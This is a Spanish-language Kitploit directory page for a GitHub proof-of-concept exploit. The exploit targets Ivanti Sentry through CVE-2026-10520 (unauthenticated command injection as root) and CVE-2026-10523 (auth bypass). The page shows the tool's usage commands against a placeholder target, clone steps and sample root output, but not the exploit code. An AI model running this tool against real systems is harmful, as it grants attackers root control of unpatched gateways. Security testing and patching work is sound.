Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-10520 — CVE-2026-10520 | Kitploit
Herramientas/GitHubGitHub/0xblackash/cve-2026-10520
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed Teaming
GitHub0xblackash/cve-2026-10520

CVE-2026-10520

CVE-2026-10520

Ver Repositorio
450hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🎯 CVE-2026-10520 & CVE-2026-10523 - Ivanti Sentry

ChatGPT Image Jun 11, 2026, 11_19_12 AM

Ivanti Sentry Crítico RCE

Ejecución remota de código sin autenticación previa + Bypass de autenticación

Autor: Ashraf Zaryouh "0xBlackash"

GitHub


📌 Resumen

Dos vulnerabilidades críticas que afectan a Ivanti Sentry (anteriormente MobileIron Sentry):

  • CVE-2026-10520 → CVSS 10.0 - Inyección de comandos del SO sin autenticación (RCE como root)
  • CVE-2026-10523 → CVSS 9.9 - Bypass de autenticación

Estas fallas permiten a atacantes no autenticados lograr un compromiso total del sistema.


✨ Características

  • ✅ PoC limpio y rápido
  • ✅ Sin autenticación previa (no se necesitan credenciales)
  • ✅ Ejecución de comandos a nivel root
Descargar herramienta
  • ✅ Formato detallado de salida
  • ✅ Soporte para proxy
  • ✅ Modo verbose
  • ✅ Interfaz de terminal atractiva

  • 🚀 Uso

    root@kitploit:~
    python3 CVE-2026-10520.py --url <TARGET> --cmd <COMMAND>
    

    Ejemplos

    root@kitploit:~
    # Basic usage
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"
    
    # Verbose mode
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v
    
    # With proxy
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080
    
    # Check kernel
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"
    

    📋 Opciones

    ArgumentoDescripciónRequerido
    --urlURL objetivo (ej. https://target:8443)Sí
    --cmdComando a ejecutarSí
    -v, --verboseHabilitar salida verboseNo
    --proxyProxy HTTP (host:puerto)No

    🛠️ Instalación

    root@kitploit:~
    git clone https://github.com/0xBlackash/CVE-2026-10520.git
    cd CVE-2026-10520
    chmod +x CVE-2026-10520.py
    

    📷 Explotación exitosa

    Cuando es vulnerable, verás:

    root@kitploit:~
    
     ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
    ██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
    ██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
    ████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
    ╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
     ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
      
              CVE-2026-10520 & CVE-2026-10523 PoC Exploit
              Ivanti Sentry Pre-Auth RCE + Auth Bypass
              
              Author: Ashraf Zaryouh "0xBlackash"
              GitHub: https://github.com/0xBlackash
    
    
    [+] Target is VULNERABLE!
    Command Output:
    uid=0(root) gid=0(root) groups=0(root)
    

    ⚠️ Aviso legal

    Esta herramienta es solo para pruebas de seguridad educativas y autorizadas.
    El uso no autorizado contra sistemas que no posees es ilegal.
    El autor no asume ninguna responsabilidad por el mal uso.


    🔧 Versiones afectadas

    • Ivanti Sentry anteriores a 10.5.2, 10.6.2, 10.7.1

    Corregido en: 10.5.2 / 10.6.2 / 10.7.1


    📜 Referencias

    • Aviso oficial de Ivanti
    • Investigación original de watchTowr Labs
    • Entradas NVD: CVE-2026-10520, CVE-2026-10523

    Hecho con ❤️ por Ashraf Zaryouh "0xBlackash"

    ¡Dale estrella al repositorio si te resultó útil! ⭐